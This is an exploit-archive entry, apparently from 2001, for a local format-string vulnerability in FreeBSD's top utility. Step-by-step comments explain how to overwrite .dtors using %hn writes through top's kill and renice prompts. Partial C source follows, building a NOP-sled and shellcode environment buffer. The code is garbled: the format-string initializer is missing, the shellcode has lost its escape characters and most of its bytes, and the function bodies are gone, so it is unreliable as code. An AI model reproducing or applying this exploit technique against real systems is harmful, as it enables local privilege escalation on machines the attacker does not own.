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# Title : FreeBSD TOP Format String Vulnerability
# Published : 2001-07-23
# Author : truefinder
# Previous Title : OpenBSD ftp Exploit (teso)
# Next Title : Debian 2.2 /usr/bin/pileup Local Root Exploit

 * freebsd x86 top exploit
 * affected under top-3.5beta9 ( including this version )
 * 1. get the address of .dtors from /usr/bin/top using objdump ,
 * 'objdump -s -j .dtors /usr/bin/top'
 * 2. divide it into four parts, and set it up into an environment variable like "XSEO="
 * 3. run top, then find "your parted addresses from "kill" or "renice" command like this
 * 'k %200$p' or 'r 2000 %200$p'
 * 4. do exploit !
 * 'k %190u%230$hn' <== 0xbf (4)
 * 'k %190u%229$hn' <== 0xbf (3)
 * 'k %214u%228$hn' <== 0xd7 (2)
 * 'k %118u%227$hn' <== 0x77 (1)
 * truefinder , seo@igrus.inha.ac.kr
 * thx mat, labman, zen-parse
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 2048
char fmt[]=
/* you would meet above things from 'k %200$p', it's confirming strings*/
/* .dtors's address in BSD*/
/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */
char sc[]=
"xb0x3bx50xcdx80"; /* bigwaks 23 bytes shellcode */
        char scbuf[BUFSIZE];
        char *scp;
        scp = (char*)scbuf;
        memset( scbuf, NOP, BUFSIZE );
        scp += ( BUFSIZE - strlen(sc) - 1);
        memcpy( scp, sc ,strlen(sc));
        scbuf[ BUFSIZE - 1] = '';
        memcpy( scbuf, "EGG=", 4);

// www.Syue.com [2001-07-23]